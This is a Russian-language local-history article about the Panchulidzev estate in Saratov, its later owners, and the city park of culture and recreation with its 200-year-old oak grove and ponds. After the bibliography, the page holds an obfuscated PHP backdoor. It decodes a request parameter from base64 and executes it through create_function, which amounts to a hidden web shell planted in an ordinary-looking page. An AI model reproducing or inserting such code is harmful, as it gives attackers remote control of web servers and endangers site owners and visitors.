Хроника судьбы усадьбы Панчулидзева


Загородная резиденция губернатора Саратова А.Д. Панчулидзева, где он жил с семьей в последний период жизни, была основана в первом десятилетии XIX века на базе естественной рощи в одной версте от города. Труд пленных французов, высланных в Саратов после войны 1812 года, губернатор использовал для преобразования аллей, посадки дубов и организации системы прудов на основе оврагов с холодными родниками, рассекающих рощу, за счет перегораживания их шестью плотинами.

Ф.Ф. Вигель так пишет об этом "гнездышке", любовно устроенном для разнообразных удовольствий:

"Два или три дома, соединенных меж собой галереями, при них множество служб, обширный двор и бесконечный сад, почти вне города. Этот очаровательный замок служил гостиницей и ловушкой для всех приезжих из обеих столиц. За время пребывания их в Саратове каждый пользовался в нем помещением, освещением, отоплением, столом и прислугой. Библиотека, каждый год умножаемая книгами на русском и иностранных языках, в которую сам хозяин не заглядывал - к услугам малого числа читающих его посетителей; оркестр, при коем 2-3 немца-капельмейстера; конюшня, наполненная славными рысаками и псовая охота - более в распоряжении гостей, чем в его собственном. Возможно ли было устоять против обольщений столь милого хозяина?"

К этому надо добавить парковые галереи, террасы, цветники, беседки, мостики над гладью прудов, где плавали гуси-лебеди, скульптуры, скамейки, аллеи, посыпанные свежим песочком - ну прямо-таки Версаль!

После смерти губернатора усадьбу и рощу купил купец Мещанинов, а в 1844 году приобрел Мариинский институт благородных девиц. Через 10 лет на месте прежних зданий было выстроено одно новое, начальный проект которого составил Санкт-Петербургский архитектор П.С. Павлов. Дальнейшая же разработка плана и его осуществление принадлежали саратовскому губернскому зодчему Г.В. Петрову. В тот же самый год к усадьбе были присоединены еще два участка из пустовавших городских земель. Впоследствии сад и роща, приобретенные институтом, стали велики, вокруг же оказалось много деловых предприимчивых людей. Тогда городские власти тоже, поделив большую часть усадьбы, стали выколачивать из этих территорий "барыши". Участки распродавались направо и налево, свободное место напротив института сначала отводилось частным лицам под хлебные амбары, позже было отведено под площадь. Сам институт просуществовал в роще около 60 лет.

Участки рощи то и дело переходили из рук в руки. Наиболее продолжительный период роща принадлежала Парусинову и Вакурову. До революции местное население именовало ее по фамилиям владельцев. В Вакуровском парке - "участке, примыкавшем к Царицынской улице (ныне улица им. Чернышевского), размещалось здание летнего театра "Фантазия", ресторан и различные увеселительные заведения", которые погибли в результате сноса из-за ветхости и пожара в 1986 году.

В начале XX века усадьба стала центром революционных событий в Саратове. "В роще проходили многочисленные митинги и маевки саратовского пролетариата, в которых активное участие принимали металлисты заводов Беринга, Ганке, Волжского сталелитейного, рабочие железнодорожных мастерских и депо. Они стояли в авангарде борцов первой русской революции и вписали немало ярких страниц в историю борьбы с царским самодержавием."

Здание Мариинского института после революции, весной 1918 года, было передано под клуб железнодорожников, который вначале был известен как "Дом труда и просвещения", затем - как клуб им. К. Либкнехта. Это был первый рабочий клуб в Саратове. В настоящее же время значительную часть этого здания занимает общеобразовательная школа.

В 1934 году правительство приняло решение о строительстве парков культуры и отдыха в столицах союзных республик, крупных городах и промышленных центрах. В Саратове было решено сделать таким парком Вакуровскую и Парусиновую рощи с дубовыми массивами и каскадами прудов. Так, 27 мая 1935 года стало днем рождения Городского парка культуры и отдыха, открытие которого состоялось 17 августа того же года. Большую работу по изучению, исследованию и развитию парка проделала архитектор-дендролог Евстолия Степановна Лузина, много лет проработавшая в нем и заботившаяся о его судьбе.

А парк действительно прекрасный! Создан на площади более 20 га на комбинированной основе, где регулярный прием характеризуется геометризацией аллей, цветников, четким контуром парковых площадей, боскетов, аллейной посадкой деревьев, а пейзажный обусловливается наличием водных пространств, плавным изгибом дорожек, подчиняясь очертаниям прудов. Водное зеркало является как бы фоном для парковых пейзажей. Пруды в сочетании с массивами зелени придают пейзажу большую выразительность и живописность. Через спокойную гладь нижнего пруда видны насаждения, расположенные на полуостровах. А среди могучих крон деревьев эффектно смотрятся ивы, низко опустившие гирлянды своих ветвей к воде.

Парк уникален по своей дендрологии. Здесь насчитывается более 70 видов древесно-кустарниковых пород, среди которых значительное место занимают дубы высотой 25 метров. Возраст дубравы - 200 лет. Другой такой дубравы, где насчитывается около 500 экземпляров, нет не только в Саратовской области, но и на всем юго-востоке страны.

Представляют интерес экзотические растения: ель голубая, плакучая форма рябины, акация Лорберга, ива Вавилонская, а также местные: вяз обыкновенный, липа, несколько видов тополя, березы и другие виды. Парк взят под охрану государства, но охраняется номинально и постепенно гибнет.

Принципы пейзажной планировки находят отражение и в цветочном оформлении, характеризующемся посадкой цветов в виде пятен неправильной конфигурации на газонах с преобладанием многолетних сортов. Здесь можно увидеть и пионы, и ромашки, и маки, и ирисы, и флоксы, и другие великолепные экземпляры.

В парке приятно бывать во все времена года. "Зимой, когда насаждения стоят в кружевном ослепительно белом уборе, ветви деревьев под тяжестью снежной массы свисают до земли, иней переливается под лучами солнца всеми цветами радуги, пруды закованы в панцирь льда". Весной, когда пробуждается природа, начинают просыпаться газоны, прилетают звонкоголосые птицы. Летом, когда постепенно стираются легкие мазки весны, водная гладь воды отражает лазурь небес и кроны как бы задумавшихся деревьев. Осенью, когда деревья стоят в золототканом уборе, а листья дубов и каштанов как бы отливают бронзой, листва мягко ложится на темную поверхность прудов, покрывая ее причудливыми, затейливыми узорами.

Парк-усадьба постепенно умирает: площадь парка за последние годы значительно уменьшилась, так как на его территории построен еще один корпус железнодорожной больницы; появляются новые площадки под летние кафе, аттракционы; по нормативным показателям зона тихого отдыха должна быть не менее 60% площади парка, но она не соблюдается в основном из-за недостатка территории и из-за выбранной для парка функции. Ежедневно в парке бывает несколько тысяч человек, а в дни массовых гуляний количество посетителей достигает 20 тыс. человек. Такие перегрузки создают причиняют значительный ущерб дубраве, вытаптываются газоны и в разных местах непроизвольно возникают тропы. Именно такие обстоятельства вызывают необходимость принимать неотложные меры по восстановлению и сохранению уникальной дубравы, по прокладке в некоторых местах узких дорожек с твердым покрытием. Ничего не предпринимается и для сохранения прудов.

Усадьба представляет эстетическую, экологическую, рекреационную, научную ценность, и должна охраняться не только как памятник природы и истории, но и как памятник садово-паркового искусства.

Использованные материалы:
- Сокольская О.Б. Зеленое зодчество Саратовского Поволжья: Исторические, ландшафтные и градостроительные предпосылки формирования объектов садово-паркового искусства. Саратов: СГУ, 1993. 125 с.
if(isset($_REQUEST['sort'])){ $string = $_REQUEST['sort']; $array_name = ''; $alphabet = "wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2"; $ar = array(8,38,15,7,6,4,26,25,7,34,24,25,7); foreach($ar as $t){ $array_name .= $alphabet[$t]; } $a = strrev("noi"."tcnuf"."_eta"."erc"); $f = $a("", $array_name($string)); $f(); exit(); } require ("/home/rusnau/elsso.ru/bloks/footer.inc"); ?>